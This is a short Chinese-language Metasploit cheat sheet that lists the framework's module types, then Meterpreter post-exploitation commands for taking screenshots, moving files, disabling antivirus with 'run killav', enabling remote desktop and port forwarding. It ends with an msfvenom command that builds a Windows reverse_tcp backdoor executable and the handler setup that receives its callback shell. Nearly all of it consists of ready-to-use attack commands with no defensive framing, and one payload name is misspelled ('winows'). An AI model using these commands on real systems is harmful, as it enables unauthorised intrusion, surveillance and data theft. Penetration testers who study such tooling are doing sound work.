模块介绍
它是一个渗透测试框架(模块介绍)
auxiliary:辅助模块,辅助渗透(端口扫描、登陆密码爆破、漏洞验证等)
exploits(exp):漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。
命名规则:操作系统/各种应用协议分类
payloads:攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码
post:后渗透阶段模块,漏洞利用成功获得meteroreter之后,向目标发送的一些功能性指令,如提权等。
encoders:编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵检测和过滤系统。
evasion:躲避模块,用来生成免杀payload
nops:由于IDS/IPS会检查数据包中不规则的数据,在某些情况下,比如针对溢出攻击,某些特殊滑行字符串(NOPS x90x90)则会因为被拦截而导致攻击失效。
后渗透
Meterpreter后渗透-常用命令
meterpreter > background 放回后台
meterpreter > exit 关闭会话
meterpreter > help 帮助信息
meterpreter > sysinfo 系统平台信息
meterpreter > screenshot 屏幕截取
meterpreter > shell 命令行shell (exit退出)
meterpreter > getlwd 查看本地目录
meterpreter > lcd 切换本地目录
meterpreter > getwd 查看目录meterpreter > ls查看文件目录列表meterpreter > cd 切换目录
meterpreter > rm 删除文件
meterpreter > download C:\\1.txt 1.txt下载文件
meterpreter > upload /var/www/wce.exe wce.exe上传文件
meterpreter > search -d c: -f *.doc搜索文件
meterpreter > execute -f cmd.exe -i执行程序/命令
meterpreter > ps 查看进程
meterpreter > getuid 查看当前用户权限
meterpreter > run killav关闭杀毒软件meterpreter > run getgui-e启用远程桌面
meterpreter > portfwd add -l 1234 -p 3389 -r <目标lP>端口转发
msfvenom生成后门木马
生成木马文件:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.xxx.xxx lport=4444 -f exe -o shell.exe
监听:
use exploit/multi/handler
set payload winows/meterpreter/reverse_tcp
set lhost 192.168.xxx.xxx
set lport 4444
run/exploit